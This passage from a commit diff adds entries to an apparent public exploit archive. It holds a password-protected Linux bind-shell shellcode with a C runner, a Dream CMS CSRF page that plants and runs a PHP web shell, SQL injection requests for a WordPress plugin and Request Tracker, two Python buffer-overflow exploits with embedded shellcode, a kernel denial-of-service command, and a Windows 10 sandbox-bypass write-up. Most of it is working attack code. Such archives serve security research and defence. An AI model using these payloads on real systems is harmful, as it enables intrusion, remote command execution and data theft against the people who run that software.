mov word [rsp + 2], 0xc579 ;port 31173
|
||||
push rsp
|
||||
pop rsi ;rsi=&sockaddr
|
||||
|
||||
bind:
|
||||
;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
|
||||
push rdx ;initialize with 0 to avoid SEGFAULT
|
||||
push 16
|
||||
pop rdx ;rdx=16 (sizeof sockaddr)
|
||||
push 49 ;bind syscall
|
||||
pop rax
|
||||
syscall
|
||||
|
||||
listen:
|
||||
;int listen(int sockfd, int backlog)
|
||||
pop rsi
|
||||
mov al, 50 ;listen syscall
|
||||
syscall
|
||||
|
||||
accept:
|
||||
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
|
||||
mov al, 43 ;accept syscall
|
||||
syscall
|
||||
|
||||
;store client
|
||||
push rax ;accept result(client)
|
||||
pop rdi ;rdi=client
|
||||
|
||||
;don't to close parent to have a small shellcode
|
||||
;in a loop is necessary to close the conection!!
|
||||
|
||||
password:
|
||||
;ssize_t read(int fd, void *buf, size_t count)
|
||||
push rsp ;1st argument
|
||||
pop rsi ;2nd argument
|
||||
xor eax, eax ;read syscall
|
||||
syscall
|
||||
|
||||
cmp dword [rsp], '1234' ;"1234" like password
|
||||
jne error ; if wrong password then crash program
|
||||
|
||||
;int dup2(int oldfd, int newfd)
|
||||
push 3
|
||||
pop rsi
|
||||
|
||||
dup2:
|
||||
dec esi
|
||||
mov al, 33 ;dup2 syscall applied to error,output and input
|
||||
syscall
|
||||
jne dup2
|
||||
|
||||
execve:
|
||||
;int execve(const char *filename, char *const argv[],char *const envp[])
|
||||
push rsi
|
||||
pop rdx ;3rd argument
|
||||
push rsi ;2nd argument
|
||||
mov rbx, 0x68732f2f6e69622f ;1st argument /bin//sh
|
||||
push rbx
|
||||
push rsp
|
||||
pop rdi
|
||||
mov al, 59 ;execve
|
||||
syscall
|
||||
|
||||
error:
|
||||
;SEGFAULT
|
||||
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
|
||||
unsigned char code[] = \
|
||||
"\x31\xf6\xf7\xe6\xff\xc6\x6a\x02\x5f\x04\x29\x0f\x05\x50\x5f\x6a\x02\x66\xc7\x44\x24\x02\x79\xc5\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x50\x5f\x54\x5e\x31\xc0\x0f\x05\x81\x3c\x24\x31\x32\x33\x34\x75\x1f\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x56\x5a\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
|
||||
|
||||
main()
|
||||
{
|
||||
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
|
||||
}
|
8
platforms/linux/local/38465.txt
Executable file
8
platforms/linux/local/38465.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/59055/info
|
||||
|
||||
The Linux kernel is prone to multiple local denial-of-service vulnerabilities.
|
||||
|
||||
Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition.
|
||||
|
||||
cd /sys/kernel/debug/tracing
|
||||
echo 1234 | sudo tee -a set_ftrace_pid
|
7
platforms/multiple/webapps/38463.txt
Executable file
7
platforms/multiple/webapps/38463.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/59053/info
|
||||
|
||||
Aibolit is prone to an information-disclosure vulnerability.
|
||||
|
||||
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
|
||||
|
||||
http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html
|
125
platforms/php/webapps/38446.html
Executable file
125
platforms/php/webapps/38446.html
Executable file
|
@ -0,0 +1,125 @@
|
|||
<!--
|
||||
|
||||
Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution
|
||||
|
||||
|
||||
Vendor: Dream CMS
|
||||
Product web page: http://www.dream-cms.kg
|
||||
Affected version: 2.3.0
|
||||
|
||||
Summary: DreamCMS is open and completely free PHP web application
|
||||
for constructing websites of any complexity.
|
||||
|
||||
Desc: Dream CMS allows users to perform certain actions via HTTP requests
|
||||
without performing any validity checks to verify the requests. This can be
|
||||
exploited to perform certain actions with administrative privileges if a
|
||||
logged-in user visits a malicious web site. Related to the CSRF issue, an
|
||||
authenticated arbitrary PHP code execution exist. The vulnerability is caused
|
||||
due to the improper verification of uploaded files in '/files-manager-administration/add-file'
|
||||
script via the 'file' POST parameter which allows of arbitrary files being
|
||||
uploaded in '/resource/filemanager/1/home/' where the admin first needs to add
|
||||
the file extension in the allowed list (csrf'd). This can be exploited to execute
|
||||
arbitrary PHP code by uploading a malicious PHP script file and execute system
|
||||
commands.
|
||||
|
||||
Tested on: nginx/1.6.2
|
||||
PHP/5.5.28
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2015-5268
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php
|
||||
|
||||
|
||||
01.10.2015
|
||||
|
||||
-->
|
||||
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title>
|
||||
</head>
|
||||
|
||||
<body onload="exploitrun();">
|
||||
|
||||
<!-- 1. Add PHP allowed extension -->
|
||||
<form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0">
|
||||
<input type="hidden" name="form_name" value="settings" />
|
||||
<input type="hidden" name="file_manager_allowed_extensions" value="bmp,gif,jpg,png,mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv,zip,rar,txt,doc,docx,pdf,php" />
|
||||
<input type="hidden" name="file_manager_allowed_size" value="2097152" />
|
||||
<input type="hidden" name="file_manager_file_name_length" value="20" />
|
||||
<input type="hidden" name="file_manager_image_extensions" value="bmp,gif,jpg,png" />
|
||||
<input type="hidden" name="file_manager_media_extensions" value="mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv" />
|
||||
<input type="hidden" name="file_manager_window_width" value="60" />
|
||||
<input type="hidden" name="file_manager_window_height" value="500" />
|
||||
<input type="hidden" name="file_manager_window_image_height" value="300" />
|
||||
<input type="hidden" name="submit" value="Save" />
|
||||
</form>
|
||||
|
||||
<!-- 2. Upload PHP file -->
|
||||
<script>
|
||||
function upload()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv");
|
||||
xhr.withCredentials = true;
|
||||
var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
|
||||
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
|
||||
"\r\n" +
|
||||
"file\r\n" +
|
||||
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
|
||||
"Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" +
|
||||
"Content-Type: application/octet-stream\r\n" +
|
||||
"\r\n" +
|
||||
"\x3c?php\r\n" +
|
||||
"system($_GET[\"cmd\"]);\r\n" +
|
||||
"?\x3e\r\n" +
|
||||
"\r\n" +
|
||||
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
|
||||
"Content-Disposition: form-data; name=\"submit\"\r\n" +
|
||||
"\r\n" +
|
||||
"Submit\r\n" +
|
||||
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
</script>
|
||||
|
||||
<form name="uploadme" action="javascript:upload();" target="frame1">
|
||||
</form>
|
||||
|
||||
<!-- 3. Code execution -->
|
||||
<form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2">
|
||||
<input type="hidden" name="cmd" value="whoami" />
|
||||
</form>
|
||||
|
||||
<iframe name="frame0"></iframe>
|
||||
<iframe name="frame1"></iframe>
|
||||
<iframe name="frame2"></iframe>
|
||||
|
||||
<script>
|
||||
function exploitrun()
|
||||
{
|
||||
document.addext.submit();
|
||||
document.getElementsByTagName("iframe")[0].onload = function()
|
||||
{
|
||||
document.uploadme.submit();
|
||||
document.getElementsByTagName("iframe")[1].onload = function()
|
||||
{
|
||||
document.exploit.submit();
|
||||
}
|
||||
}
|
||||
}
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
9
platforms/php/webapps/38458.txt
Executable file
9
platforms/php/webapps/38458.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/59021/info
|
||||
|
||||
Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Spider Video Player 2.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
|
21
platforms/php/webapps/38459.txt
Executable file
21
platforms/php/webapps/38459.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
source: http://www.securityfocus.com/bid/59022/info
|
||||
|
||||
Request Tracker is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
RT 4.0.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
POST /Approvals/ HTTP/1.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
|
||||
Accept-Language: en-US
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Referer: http://www.example.com/Approvals/
|
||||
Host: 10.10.10.70
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
|
||||
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
|
||||
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
|
||||
Content-Length: 120
|
||||
|
||||
ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
|
41
platforms/windows/local/38456.py
Executable file
41
platforms/windows/local/38456.py
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow
|
||||
# Date: 10/13/2015
|
||||
# Exploit Author: ArminCyber
|
||||
# Contact: Armin.Exploit@gmail.com
|
||||
# Version: 1.1
|
||||
# Tested on: XP SP3 EN
|
||||
# Description: A malicious .aiff file cause this vulnerability.
|
||||
# category: Local Exploit
|
||||
|
||||
|
||||
f = open("malicious.aiff", "w")
|
||||
|
||||
f.write("A"*4132)
|
||||
|
||||
f.write("\xeb\x06\x90\x90")
|
||||
|
||||
f.write("\xa4\x43\x40\x00")
|
||||
|
||||
# Shelcode:
|
||||
# windows/exec - 277 bytes
|
||||
# CMD=calc.exe
|
||||
f.write("\x90"*20)
|
||||
f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
|
||||
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
|
||||
"\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
|
||||
"\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
|
||||
"\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
|
||||
"\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
|
||||
"\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
|
||||
"\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
|
||||
"\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
|
||||
"\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
|
||||
"\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
|
||||
"\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
|
||||
"\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
|
||||
"\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
|
||||
"\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
|
||||
"\xc4\xd9")
|
||||
f.write("\x90"*20)
|
||||
|
||||
f.close()
|
147
platforms/windows/local/38467.py
Executable file
147
platforms/windows/local/38467.py
Executable file
|
@ -0,0 +1,147 @@
|
|||
'''
|
||||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
================================
|
||||
www.adobe.com
|
||||
|
||||
|
||||
Product:
|
||||
=================================
|
||||
AdobeWorkgroupHelper.exe v2.8.3.3
|
||||
Part of Photoshop 7.0 circa 2002
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===========================
|
||||
Stack Based Buffer Overflow
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup
|
||||
functionality, that lets users work with files on a server that is
|
||||
registered as a workgroup.
|
||||
If AdobeWorkgroupHelper.exe is called with an overly long command line
|
||||
argument it is vulnerable to a stack based buffer overflow exploit.
|
||||
|
||||
Resluting in arbitrary code execution undermining the integrity of the
|
||||
program. We can control EIP register at about 5,856 bytes, our shellcode
|
||||
will point
|
||||
to ECX register.
|
||||
|
||||
Tested successfully on Windows 7 SP1
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
Use below python script to exploit...
|
||||
'''
|
||||
|
||||
import struct,os,subprocess
|
||||
|
||||
#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
|
||||
#Tested Windows 7 SP1
|
||||
#------------------------------------
|
||||
#by hyp3rlinx - apparitionsec@gmail.com
|
||||
#hyp3rlinx.altervista.org
|
||||
#==============================================================
|
||||
#
|
||||
#0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll]
|
||||
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
|
||||
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
|
||||
#===============================================================
|
||||
|
||||
'''
|
||||
Quick Register dump...
|
||||
|
||||
EAX 00270938
|
||||
ECX 00270A7C <---------------BOOM!
|
||||
EDX 00A515FC ASCII "AAAAAA..."
|
||||
EBX 41414140
|
||||
ESP 0018FEB0
|
||||
EBP 0018FED0
|
||||
ESI 00000000
|
||||
EDI 41414141
|
||||
EIP 004585C8 AdobeWor.004585C8
|
||||
C 0 ES 002B 32bit 0(FFFFFFFF)
|
||||
P 0 CS 0023 32bit 0(FFFFFFFF)
|
||||
A 0 SS 002B 32bit 0(FFFFFFFF)
|
||||
Z 0 DS 002B 32bit 0(FFFFFFFF)
|
||||
S 0 FS 0053 32bit 7EFDD000(FFF)
|
||||
T 0 GS 002B 32bit 0(FFFFFFFF)
|
||||
D 0
|
||||
O 0 LastErr ERROR_SUCCESS (00000000)
|
||||
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
|
||||
|
||||
'''
|
||||
|
||||
|
||||
#shellcode to pop calc.exe Windows 7 SP1
|
||||
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
|
||||
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
|
||||
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
|
||||
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
|
||||
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
|
||||
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
|
||||
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
|
||||
|
||||
vulnpgm="C:\Program Files (x86)\Common
|
||||
Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "
|
||||
|
||||
#payload="A"*5852+"R"*4 #<---- control EIP register
|
||||
|
||||
#our shellcode will point at ECX register, so we need to find an JMP or
|
||||
CALL ECX and point EIP to that address
|
||||
#where our malicious code resides, we find it in ARM.dll
|
||||
|
||||
eip=struct.pack('<L', 0x618B19F7) #CALL ECX ARM.dll v2.8.3.3
|
||||
payload="A"*5852+eip+"\x90"*20+sc #<----- direct EIP overwrite BOOOOOM!!!
|
||||
|
||||
subprocess.Popen([vulnpgm, payload], shell=False)
|
||||
|
||||
|
||||
'''
|
||||
Disclosure Timeline:
|
||||
=========================================================
|
||||
Vendor Notification: August 31, 2015
|
||||
October 12, 2015 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
=========================================================
|
||||
Med
|
||||
|
||||
|
||||
===========================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
||||
'''
|
118
platforms/windows/local/38472.py
Executable file
118
platforms/windows/local/38472.py
Executable file
|
@ -0,0 +1,118 @@
|
|||
'''
|
||||
[+] Credits: hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt
|
||||
|
||||
|
||||
Vendor:
|
||||
================================
|
||||
www.blat.net
|
||||
http://sourceforge.net/projects/blat/
|
||||
|
||||
|
||||
Product:
|
||||
================================
|
||||
Blat v2.7.6
|
||||
|
||||
blat.exe is a Win32 command line eMail tool
|
||||
that sends eMail using SMTP or post to usenet using NNTP.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=====================
|
||||
Stack Buffer Overflow
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
An older release of blat.exe v2.7.6 is prone to a stack based buffer
|
||||
overflow when sending
|
||||
malicious command line arguments, we need to send two arguments first
|
||||
can be whatever e.g. "AAAA"
|
||||
then second argument to trigger the buffer overflow and execute
|
||||
arbitrary code on the victims OS.
|
||||
|
||||
|
||||
Stack dump...
|
||||
|
||||
|
||||
EAX 00000826
|
||||
ECX 0018E828 ASCII "Blat saw and processed these options, and was
|
||||
confused by the last one...
|
||||
AAAAAAA...
|
||||
EDX 0008E3C8
|
||||
EBX 000000E1
|
||||
ESP 0018F05C ASCII "AAAAA...
|
||||
EBP 41414141
|
||||
ESI 00426E88 blat.00426E88
|
||||
EDI 00272FD8
|
||||
EIP 41414141 <-------------- BOOM!
|
||||
|
||||
C 0 ES 002B 32bit 0(FFFFFFFF)
|
||||
P 1 CS 0023 32bit 0(FFFFFFFF)
|
||||
A 0 SS 002B 32bit 0(FFFFFFFF)
|
||||
Z 1 DS 002B 32bit 0(FFFFFFFF)
|
||||
S 0 FS 0053 32bit 7EFDD000(FFF)
|
||||
T 0 GS 002B 32bit 0(FFFFFFFF)
|
||||
D 0
|
||||
O 0 LastErr ERROR_SUCCESS (00000000)
|
||||
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
Python script to exploit...
|
||||
'''
|
||||
|
||||
import struct,os,subprocess
|
||||
|
||||
|
||||
#pop calc.exe Windows 7 SP1
|
||||
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
|
||||
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
|
||||
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
|
||||
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
|
||||
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
|
||||
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
|
||||
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
|
||||
|
||||
vulnpgm="C:\\blat276\\full\\blat.exe "
|
||||
eip=struct.pack('<L', 0x776D0115) #<--- JMP ESP kernel32.dll
|
||||
|
||||
payload="A"*2018+eip+"\x90"*20+sc
|
||||
subprocess.Popen([vulnpgm, "A"*4, payload], shell=False)
|
||||
|
||||
|
||||
'''
|
||||
Disclosure Timeline:
|
||||
=========================================================
|
||||
Oct 14, 2015 : Public Disclosure
|
||||
|
||||
|
||||
Severity Level:
|
||||
=========================================================
|
||||
Med
|
||||
|
||||
|
||||
===========================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that
|
||||
due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given
|
||||
to the author.
|
||||
The author is not responsible for any misuse of the information
|
||||
contained herein and prohibits any malicious use of all security
|
||||
related information or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
||||
'''
|
52
platforms/windows/local/38474.txt
Executable file
52
platforms/windows/local/38474.txt
Executable file
|
@ -0,0 +1,52 @@
|
|||
Source: https://code.google.com/p/google-security-research/issues/detail?id=486
|
||||
|
||||
Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass
|
||||
Platform: Windows 10 (build 10240), earlier versions do not have the functionality
|
||||
Class: Security Feature Bypass
|
||||
|
||||
Summary:
|
||||
A mitigation added to Windows 10 to prevent NTFS Mount Reparse Points being created at integrity levels below medium can be bypassed.
|
||||
|
||||
Description:
|
||||
|
||||
Windows 10 has added some new mitigations to block the creation or change the behaviour of certain symbolic links when issued by a low integrity/sandboxed process. The presumed aim to to make it harder to abuse these types of tricks to break out of a sandbox.
|
||||
|
||||
In earlier builds on Windows 10 NTFS Mount Reparse Points were blocked outright from a sandboxed process, however in 10240 (what can only be assumed a final build) the check was moved to the kernel in IopXXXControlFile and changed slightly so that sandboxed processes could create some mount points. The check is roughly:
|
||||
|
||||
if (RtlIsSandboxedProcess()) {
|
||||
if(ControlCode == FSCTL_SET_MOUNT_POINT) {
|
||||
if (FsRtlValidateReparsePointBuffer(buffer) && buffer->ReparseTag == TAG_MOUNT_POINT) {
|
||||
NTSTATUS status = ZwOpenFile(..., buffer->ReparseTarget, FILE_GENERIC_WRITE, ... , FILE_DIRECTORY_FILE);
|
||||
if (!NT_SUCCESS(status)) {
|
||||
return status;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
The kernel is therefore checking that the target of the mount point is a directory and that the current process has write access to the directory. This would sufficiently limit the ability of a sandboxed process to abuse this to write files at a higher privilege. Unfortunately there’s a perhaps unexpected problem with this check, the sandboxed process can redirect the ZwOpenFile call arbitrarily to something it can open for write, yet the original value is set as the mount point. This is because the file open check is being made inside the process which is doing the call which means it honours the user’s device mapping.
|
||||
|
||||
While the sandboxed process cannot change the per-user drive mappings, it can change the process’s device map using NtSetInformationProcess with the ProcessDeviceMap information class. As we can create arbitrary object directories and symbolic links (which while they also have a mitigation it only prevents a higher privilege process following them, which we don’t care about) we can build a completely fake device map which redirects the open to another directory. A good target turns out to be \Device\NamedPipe\ (note the trailing slash) as that can be opened from any privilege level (including Chrome renderer processes) for write access and as a directory. So if we want to set an arbitrary mount point to say \??\c:\somewhere we can build something like:
|
||||
|
||||
<UNNAMED>(DIR) -> C:(DIR) -> somewhere(LINK to \Device\NamedPipe\)
|
||||
|
||||
If we set the unnamed directory to the process device map we can bypass the check and create the mount point.
|
||||
|
||||
Perhaps from a fix perspective you could query for the opened path and use that to write to the NTFS reparse point rather than using the original value.
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low. Ensure you use the correct version for the architecture on Windows, as there seems to be a bug in NtSetInformationProcess which blocks Wow64 apps from setting the process device map. You can compare the operation to the command shell’s mklink tool that will fail to create the mount point at low integrity. The archive password is ‘password’. Follow these steps:
|
||||
|
||||
1) Extract the PoC to a location on a local hard disk which is writable by a normal user.
|
||||
2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example:
|
||||
poc.exe c:\users\user\appdata\local\low\abc c:\notreal.
|
||||
|
||||
Expected Result:
|
||||
It shouldn’t be possible to create a mount point pointed at a location not writable by low integrity user
|
||||
|
||||
Observed Result:
|
||||
The mount point is created successfully.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38474.zip
|
Loading…
Add table
Reference in a new issue